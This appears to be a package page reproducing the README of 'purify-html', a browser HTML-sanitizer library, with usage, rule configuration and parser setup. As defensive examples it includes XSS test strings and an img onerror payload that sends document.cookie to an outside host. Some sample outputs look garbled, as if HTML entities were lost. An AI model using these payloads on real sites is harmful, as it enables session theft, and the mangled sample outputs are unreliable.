
Security News
Attackers Are Hunting High-Impact Node.js Maintainers in a Coordinated Social Engineering Campaign
Multiple high-impact npm maintainers confirm they have been targeted in the same social engineering campaign that compromised Axios.
purify-html
Advanced tools
A minimalistic library for sanitizing strings so that they can be safely used as HTML.
A minimalist client library for cleaning up strings so they can be safely used as HTML.
Do simple things simply: zero configuration to completely strip a string of HTML, with the ability to incrementally customize as needed.
The basic idea is to use the browser API to parse and modify the DOM. Thus, several goals are achieved at once:
As a result, parsing with DOMParser is more reliable, faster and does not require precious kilobytes of space in the build.
npm
npm install purify-html
yarn
yarn add purify-html
CDN
<script src="https://cdn.jsdelivr.net/npm/purify-html/dist/index.es.js"></script>
<!-- or -->
<script type="module">
import PurifyHTML from 'https://cdn.jsdelivr.net/npm/purify-html/+esm';
</script>
import PurifyHTML, { setParser } from 'purify-html';
const sanitizer = new PurifyHTML(options);
setParser({
parse(str: string): Element
stringify(elem: Element): string
}): void
See here for details.
objectsanitize(string): stringPerforms string cleanup according to the rules passed in options.
import PurifyHTML, { setParser } from 'purify-html';
const sanitizer = new PurifyHTML(options);
const untrustedString = '...';
console.log(sanitizer.sanitize(untrustedString));
toHTMLEntities(string): stringCoerces a string to HTML entities. Very similar to escaping, but for the HTML interpreter. In HTML, such characters will be rendered "as is". See more here.
const str = '<br />';
console.log(
sanitizer.toHTMLEntities(str); // => '<br />', displays at the page like '<br />'
);
Array<string | TagRule>An array with rules for the sanitizer.
// Deprecated!
type AttributeRulePresetName =
| '%correct-link%'
| '%http-link%'
| '%https-link%'
| '%ftp-link%'
| '%https-link-without-search-params%'
| '%http-link-without-search-params%'
| '%same-origin%';
interface AttributeRule = {
// attribute name
name: string;
// rules for attribute value
value?:
| string
| string[]
| RegExp
| { preset: AttributeRulePresetName } // Deprecated!
| ((attributeValue: string) => boolean);
};
interface TagRule = {
// tagname
name: string;
// rules for attributes
attributes: AttributeRule[];
// Don't remove comments in THIS node.
// Comments in children nodes will be saved
dontRemoveComments?: boolean;
/*
Example:
Config
[
{ name: 'div', dontRemoveComments: true },
'span'
]
Input:
<div>
<!-- comment 0 -->
<span> <!-- comment 1 --> </span>
</div>
Output:
<div>
<!-- comment 0 -->
<span> </span>
</div>
*/
};
import PurifyHTML, { setParser } from 'purify-html';
const sanitizer = new PurifyHTML([
'hr',
{ name: 'br' },
{ name: 'img', attributes: [{ name: 'src' }] },
{
name: 'a',
attributes: [
{ name: 'target', value: ['_blank', '_self', '_parent', '_top'] },
{ name: 'href', value: /^https?:\/\/*/ },
],
},
]);
NOTE When using regular expressions to check for untrusted strings, don't forget to check your regular expressions for ReDoS vulnerabilities.
A successful exploit of the ReDoS vulnerability is to cause the program to hang when trying to parse a specially crafted string.
See more: https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS
via bundler:
import PurifyHTML from 'purify-html';
const allowedTags = [
// only string
'hr',
// as object
{ name: 'br' },
// attributes check
{ name: 'b', attributes: ['class'] },
// advanced attributes check
{ name: 'p', attributes: [{ name: 'class' }] },
// check attributes values (string)
{ name: 'strong', attributes: [{ name: 'id', value: 'awesome-strong-id' }] },
// check attributes values (RegExp)
{ name: 'em', attributes: [{ name: 'id', value: /awesome-em-id?s/ }] },
// check attributes values (array of strings)
{
name: 'em',
attributes: [
{ name: 'id', value: ['awesome-strong-id', 'other-awesome-strong-id'] },
],
},
// check attribute value (function)
{
name: 'em',
attributes: [{ name: 'id', value: value => value.startsWith('awesome-') }],
},
// use attributes checks preset (Deprecated)
{
name: 'a',
attributes: [{ name: 'href', value: { preset: '%https-link%' } }], // presets are deprecated
},
];
const sanitizer = new PurifyHTML(allowedTags);
const dangerString = `
<script> fetch('google.com', { mode: 'no-cors' }) </script>
<<div></div>img src="1" onerror="alert(1)">
<img src="1" onerror="alert(1)">
<b>Bold</b>
<b class="red">Bold</b>
<b class="red" onclick="alert(1)">Bold</b>
<p data-some="123" data-some-else="321">123</p>
<div></div>
<hr>
`;
const safeString = sanitizer.sanitize(dangerString);
console.log(safeString);
/*
<img src="1" onerror="alert(1)">
<b>Bold</b>
<b class="red">Bold</b>
<b class="red">Bold</b>
<p data-some="123">123</p>
<hr>
*/
<!-- ... -->
<head>
<!-- ... -->
<script src="https://unpkg.com/purify-html@latest/dist/index.es.js"></script>
</head>
<!-- ... -->
<script>
PurifyHTML.setParser(/* ... */);
const sanitizer = new PurifyHTML.sanitizer(/* ... */);
sanitizer.sanitize(/* ... */);
</script>
<!-- ... -->
Usage for the browser is slightly different from usage with faucets. This is bad, but it had to be done in order not to clog the global scope.
For example the line: <!-- <img src="x" onerror="alert(1)"> -->.
Technically, inserting it into the DOM will not lead to code execution, but it cannot be considered safe either. The result of the sanitize method is declared to be sanitized using the rules specified when the sanitizer was initialized.
NOTE
CDATA comments (or CDATA sections), although made for XML, are also supported in HTML. Inpurify-htmlthey are treated as regular HTML comments.
See more about CDATA Section on MDN
Therefore, you are given the opportunity to control in which places you will leave comments, and in which not.
By default, HTML comments are stripped. You can change it like this:
import PurifyHTML from 'purify-html';
const sanitizer = new PurifyHTML(['#comments' /* ... */]);
sanitizer.sanitize(/* ... */);
If you want comments to be removed everywhere except for specific tags, then you can specify it like this:
import PurifyHTML from 'purify-html';
const rules = ['#comments', { name: 'div', dontRemoveComments: true }];
const sanitizer = new PurifyHTML(rules);
sanitizer.sanitize(/* ... */);
When used in an environment where the standard DOMParser is absent, you need to install a parser manually.
For example:
import { JSDOM } from 'jsdom';
global.DOMParser = new JSDOM().window.DOMParser;
import PurifyHTML from 'purify-html';
const sanitizer = new PurifyHTML(); // works
Or
import { JSDOM } from 'jsdom';
import PurifyHTML, { setParser } from 'purify-html';
// Scope elem variable, reuse DOMParser instance for performance
{
const elem: Element = new DOMParser()
.parseFromString('', 'text/html')
.querySelector('body');
// Set methods
setParser({
parse(string: string): Element {
elem.innerHTML = string;
return elem;
},
stringify(elem: Element): string {
return elem.innerHTML;
},
});
}
In some cases, you may want to be able to use your parser instead of DOMParser.
This can be done like this:
import PurifyHTML, { setParser } from 'purify-html';
setParser({
parse(HTMLString: string): HTMLElement {
// ...
},
stringify(element: HTMLElement): string {
// ...
},
});
const sanitizer = new PurifyHTML();
// ...
Note! The root element will be passed to the stringify function, and the CONTENT of the element will be expected as a result.
const input = document.createElement('div');
input.innerHTML = '<span>span</span>';
stringify(input); // '<span>span</span>' => OK
stringify(input); // '<div><span>span</span></div>' => WRONG
document.createElement(...)Because by processing the string like this:
const parse = str => {
const node = document.createElement('div');
div.innerHTML = str;
return div;
};
In fact, this function, having received a special payload, will RUN it. The following payload will send a network request:
<img/src/onerror="fetch('www.site.com?q='+encodeURI(document.cookie))">
And in the case of using DOMParser, the code does not run.
%correct-link% - only currect link%http-link% - only http link%https-link% - only https link%ftp-link% - only ftp link%https-link-without-search-params% - delete all search params and force https protocol%http-link-without-search-params% - delete all search params and force https protocol%same-https-origin% - only link that lead to the same origin that is currently in self.location.origin. + force https protocol%same-http-origin% - only link that lead to the same origin that is currently in self.location.origin. + force http protocolAlthough browser support is already over 97%, the specification for DOMParser is not yet fully established. More details.

If you find this project helpful, please give it a ⭐️ on GitHub to show your support. I would also appreciate it if you shared it with others who might find it useful!
FAQs
A minimalistic library for sanitizing strings so that they can be safely used as HTML.
We found that purify-html demonstrated a not healthy version release cadence and project activity because the last version was released a year ago. It has 0 open source maintainers collaborating on the project.
Did you know?

Socket for GitHub automatically highlights issues in each pull request and monitors the health of all your open source dependencies. Discover the contents of your packages and block harmful activity before you install or update your dependencies.

Security News
Multiple high-impact npm maintainers confirm they have been targeted in the same social engineering campaign that compromised Axios.

Security News
Axios compromise traced to social engineering, showing how attacks on maintainers can bypass controls and expose the broader software supply chain.

Security News
Node.js has paused its bug bounty program after funding ended, removing payouts for vulnerability reports but keeping its security process unchanged.